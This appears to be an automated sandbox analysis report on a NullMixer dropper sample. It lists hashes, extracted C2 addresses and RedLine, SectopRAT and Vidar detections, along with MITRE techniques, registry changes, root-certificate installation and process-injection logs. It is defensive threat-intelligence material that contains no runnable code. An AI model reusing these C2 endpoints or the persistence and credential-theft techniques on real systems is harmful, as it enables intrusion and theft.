nullmixer | bae14391cbc9ddb999947b70f3975a7309f73d422a02aaa13ae9100baaa0652c

Analysis

max time kernel
95s
max time network
150s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
14-10-2024 23:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

44ac6fc2f8d02857f9d7a7bfde1e2376_JaffaCakes118.exe
Size

3.9MB
MD5

44ac6fc2f8d02857f9d7a7bfde1e2376
SHA1

0e3c85f03fd36cc4001fb68996b53ff8afb17f7e
SHA256

bae14391cbc9ddb999947b70f3975a7309f73d422a02aaa13ae9100baaa0652c
SHA512

585a915f8669d2303eca95729ec062dbe08907c33e5685f68a0fa563d3ba03f0754b82982c28e74a1f586d5c96872cb1a0c11fb30eec95c3263fcf058ec2cca8
SSDEEP

98304:yRRSck04HegEY+uTckcooqU/q6DvkT2WT7Xz4OwQ:yucwegEuTckXCu9fMOT

Score

10^/10

nullmixer privateloader redline sectoprat vidar build1 aspackv2 discovery dropper execution infostealer loader persistence rat spyware stealer trojan

Malware Config

Extracted

Family

nullmixer

http://marisana.xyz/

Extracted

Family

redline

Botnet

Build1

45.142.213.135:30058

Signatures

NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

resource	yara_rule
behavioral1/memory/292-267-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/292-264-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/292-262-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/292-274-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral1/memory/292-270-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 5 IoCs

resource	yara_rule
behavioral1/memory/292-267-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/292-264-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/292-262-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/292-274-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat
behavioral1/memory/292-270-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral1/memory/1736-232-0x0000000000400000-0x0000000002CC8000-memory.dmp	family_vidar
behavioral1/memory/1736-249-0x0000000000400000-0x0000000002CC8000-memory.dmp	family_vidar

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1160	powershell.exe

ASPack v2.12-2.42 3 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x00070000000160d9-37.dat	aspack_v212_v242
behavioral1/files/0x00070000000162e3-43.dat	aspack_v212_v242
behavioral1/files/0x0008000000015f4d-39.dat	aspack_v212_v242

Executes dropped EXE 22 IoCs

pid	Process
2300	setup_installer.exe
1572	setup_install.exe
1764	405416bb3.exe
2508	3471594dd7.exe
2744	acd8df2828a741.exe
2532	65ede2731b8f4.exe
2944	2fb5007056.exe
2484	70abe7c2b625.exe
1736	4b907596199.exe
2932	69229f3d88908bd2.exe
1856	acd8df2828a74010.exe
2392	acd8df2828a74010.exe
1052	1cr.exe
1028	chrome2.exe
2820	setup.exe
916	winnetdriv.exe
1844	services64.exe
2452	1cr.exe
2604	1cr.exe
292	1cr.exe
2236	BUILD1~1.EXE
2548	sihost64.exe

Loads dropped DLL 58 IoCs

pid	Process
1532	44ac6fc2f8d02857f9d7a7bfde1e2376_JaffaCakes118.exe
2300	setup_installer.exe
2300	setup_installer.exe
2300	setup_installer.exe
2300	setup_installer.exe
2300	setup_installer.exe
2300	setup_installer.exe
1572	setup_install.exe
1572	setup_install.exe
1572	setup_install.exe
1572	setup_install.exe
1572	setup_install.exe
1572	setup_install.exe
1572	setup_install.exe
1572	setup_install.exe
2672	cmd.exe
2688	cmd.exe
2632	cmd.exe
2844	cmd.exe
2604	cmd.exe
2508	3471594dd7.exe
2508	3471594dd7.exe
2724	cmd.exe
760	cmd.exe
2512	cmd.exe
760	cmd.exe
2944	2fb5007056.exe
2944	2fb5007056.exe
2512	cmd.exe
2516	cmd.exe
2516	cmd.exe
1736	4b907596199.exe
1736	4b907596199.exe
2932	69229f3d88908bd2.exe
2932	69229f3d88908bd2.exe
1856	acd8df2828a74010.exe
1856	acd8df2828a74010.exe
1856	acd8df2828a74010.exe
2392	acd8df2828a74010.exe
2392	acd8df2828a74010.exe
1052	1cr.exe
1052	1cr.exe
2508	3471594dd7.exe
2508	3471594dd7.exe
2820	setup.exe
2220	WerFault.exe
2220	WerFault.exe
2220	WerFault.exe
2220	WerFault.exe
1028	chrome2.exe
1052	1cr.exe
1052	1cr.exe
1052	1cr.exe
292	1cr.exe
292	1cr.exe
2236	BUILD1~1.EXE
2236	BUILD1~1.EXE
1844	services64.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	65ede2731b8f4.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
43	iplogger.org
64	iplogger.org
65	iplogger.org
98	raw.githubusercontent.com
99	raw.githubusercontent.com
41	iplogger.org
42	iplogger.org

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ipinfo.io
7	ipinfo.io
11	api.db-ip.com
13	api.db-ip.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1052 set thread context of 292	1052	1cr.exe	72

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\winnetdriv.exe	setup.exe
File opened for modification	C:\Windows\winnetdriv.exe	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2220	1572	WerFault.exe	29

System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2fb5007056.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	acd8df2828a74010.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1cr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BUILD1~1.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3471594dd7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4b907596199.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winnetdriv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	44ac6fc2f8d02857f9d7a7bfde1e2376_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	69229f3d88908bd2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	acd8df2828a74010.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1cr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	4b907596199.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	4b907596199.exe

Modifies Internet Explorer settings 1 TTPs 32 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000008c0cffad38b18a49b15ccd622db9777b00000000020000000000106600000001000020000000811f925907ac0a70143c51e3728db08cce4c37f10ee52acf1e1f8df56c936fbb000000000e800000000200002000000032c99ac65960a31ccc1c1d1b8e9f7b8cc8395f1ffa70b2099a86860bc7d96cfd90000000d1107eb55d592b10f84bb7cb3a106c48ad3030f4fbde920a526ffa84a9fd7ea6011e975b9cadd8ec68901085012520ec707f023ef7904c1b39d9d877d6b2789c109222be7cb76c434b9a7733d55e9f6feff3d902d1e8440b49d5cedaee788ffe7283c119da57755e218bcf7d6a8cfb9da6bfc385341b68ce89e840e109db26f374fdce24679d57b0d0da54d6538bb4bf400000008c18792e4129818e2b3ef5b227c141148604d52be1f10f0835e138411b47fe8846e495b49d8a7e84ed330905c735f9e3ffc86574bdd70f2e612528903ff24cf3	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000008c0cffad38b18a49b15ccd622db9777b00000000020000000000106600000001000020000000868690f8f2a3a20f79ee1986d4a81a9ed74237498f5f1d8a45b914a82e761bf1000000000e80000000020000200000002b3566f59a03a9c4e0d2415b6700eee21b1dbba1a8ff2fc2c6cb3a0c10829cbd200000004889d454af7ac4274bf3b0ee21145c87560e3a13ab9e67cdafab5c77969042ed4000000028a22df1714c98829f6fcd29f65515f650eaf9711cc833e75469d6516b50515e3894968743c9302c1f7e7fe44a5699ee7c78d3a2a60c50f61595d6c24b8ffd61	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 202c44998f1edb01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{C3E837A1-8A82-11EF-A1CA-D22B03723C32} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	4b907596199.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	4b907596199.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	4b907596199.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	services64.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2584	schtasks.exe
1992	schtasks.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
1736	4b907596199.exe
1736	4b907596199.exe
1736	4b907596199.exe
1736	4b907596199.exe
1028	chrome2.exe
2932	69229f3d88908bd2.exe
2932	69229f3d88908bd2.exe
2932	69229f3d88908bd2.exe
2932	69229f3d88908bd2.exe
2932	69229f3d88908bd2.exe
2932	69229f3d88908bd2.exe
2932	69229f3d88908bd2.exe
2932	69229f3d88908bd2.exe
2932	69229f3d88908bd2.exe
2932	69229f3d88908bd2.exe
2932	69229f3d88908bd2.exe
2932	69229f3d88908bd2.exe
2932	69229f3d88908bd2.exe
1052	1cr.exe
1052	1cr.exe
1052	1cr.exe
1052	1cr.exe
1160	powershell.exe
1844	services64.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	1764	405416bb3.exe
Token: SeDebugPrivilege	2484	70abe7c2b625.exe
Token: SeDebugPrivilege	1028	chrome2.exe
Token: SeDebugPrivilege	1052	1cr.exe
Token: SeDebugPrivilege	292	1cr.exe
Token: SeDebugPrivilege	1160	powershell.exe
Token: SeDebugPrivilege	1844	services64.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2416	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2416	iexplore.exe
2416	iexplore.exe
2900	IEXPLORE.EXE
2900	IEXPLORE.EXE
2900	IEXPLORE.EXE
2900	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1532 wrote to memory of 2300	1532	44ac6fc2f8d02857f9d7a7bfde1e2376_JaffaCakes118.exe	28
PID 1532 wrote to memory of 2300	1532	44ac6fc2f8d02857f9d7a7bfde1e2376_JaffaCakes118.exe	28
PID 1532 wrote to memory of 2300	1532	44ac6fc2f8d02857f9d7a7bfde1e2376_JaffaCakes118.exe	28
PID 1532 wrote to memory of 2300	1532	44ac6fc2f8d02857f9d7a7bfde1e2376_JaffaCakes118.exe	28
PID 1532 wrote to memory of 2300	1532	44ac6fc2f8d02857f9d7a7bfde1e2376_JaffaCakes118.exe	28
PID 1532 wrote to memory of 2300	1532	44ac6fc2f8d02857f9d7a7bfde1e2376_JaffaCakes118.exe	28
